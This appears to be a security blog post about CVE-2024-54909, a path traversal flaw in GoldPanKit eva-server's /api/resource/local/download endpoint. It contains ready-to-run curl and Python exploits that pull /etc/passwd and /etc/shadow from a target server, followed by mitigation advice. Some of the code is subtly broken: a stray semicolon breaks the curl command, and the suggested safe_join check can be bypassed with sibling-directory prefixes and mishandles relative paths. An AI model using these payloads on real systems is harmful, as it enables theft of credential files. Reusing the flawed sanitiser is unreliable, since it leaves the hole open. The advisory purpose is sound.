CVE-2024-54909 - Unrestricted Download Vulnerability in GoldPanKit eva-server v4.1. – Exploit & Mitigation Guide

CVE-2024-54909 exposes a critical security issue in GoldPanKit eva-server v4.1.. This exclusive article breaks down what the flaw is, why it matters, how it can be exploited, and ways you can prevent becoming a victim. Simple explanations, real exploit code, and all the references you’ll need.

What is CVE-2024-54909?

This vulnerability is an arbitrary file download issue found in GoldPanKit eva-server version 4.1.. It involves the /api/resource/local/download endpoint, where an attacker can abuse the path query parameter to download files outside the intended directory.

Normally, users should only be able to download safe files, but with this vulnerability, an attacker can grab anything — like system config files, web server credentials, or tokens — leading to serious data leaks or even server compromise.

Vulnerable Endpoint

POST /api/resource/local/download

Parameter: path (controls which file to download)

Problem: The application fails to sanitize the path parameter, so attackers can perform path traversal (using ../ to break out of the intended folder) and grab any file on the server.

Here’s a real-world example using curl — just substitute the target server’s address

curl -X POST "http://target-server:port/api/resource/local/download"; \
  -H "Content-Type: application/json" \
  -d '{"path": "../../../../etc/passwd"}' --output passwd.txt

This downloads /etc/passwd, a common Linux file — but it could be any file readable by the server process.

Python Exploit Example

import requests

target = "http://target-server:port";
vulnerable_endpoint = "/api/resource/local/download"
malicious_path = "../../../../etc/shadow"

body = {
    "path": malicious_path
}

response = requests.post(target + vulnerable_endpoint, json=body)

if response.status_code == 200:
    with open('shadow.txt', 'wb') as f:
        f.write(response.content)
    print('[+] File successfully downloaded!')
else:
    print('[-] Exploit failed. Status code:', response.status_code)

Original References

- NVD - CVE-2024-54909 Detail
- GoldPanKit eva-server official page
- Common Path Traversal Attacks

Upgrade: Check GoldPanKit’s site for patches or updates addressing CVE-2024-54909.

- Sanitize Input: If you must provide file download capability, restrict the path parameter to a safe folder, strip out ../, and deny access to files outside it.

Web Application Firewall (WAF): Employ rules to block suspicious download requests.

- Monitor Logs: Watch for unusual file download attempts, especially those containing .. in the path parameter.

Example Mitigation (in Python)

import os

def safe_join(base_dir, user_path):
    # Cleans the path and prevents going up directories
    safe_path = os.path.normpath(os.path.join(base_dir, user_path))
    if not safe_path.startswith(os.path.abspath(base_dir)):
        raise Exception("Invalid path!")
    return safe_path

Conclusion

CVE-2024-54909 in GoldPanKit eva-server is a powerful example of how unsanitized user input can put an entire server at risk. File download endpoints must strictly control what files users can access. If you run GoldPanKit eva-server, upgrade now and audit your endpoints!

Stay safe — always validate user input and keep your systems patched.


If you found this post useful, consider sharing with your team or colleagues! Got more info about this CVE? Comment below or reach out.

*This article is exclusive and independently written for info/sec professionals by security researchers.*

Timeline

Published on: 02/06/2025 22:15:38 UTC
Last modified on: 02/12/2025 15:15:15 UTC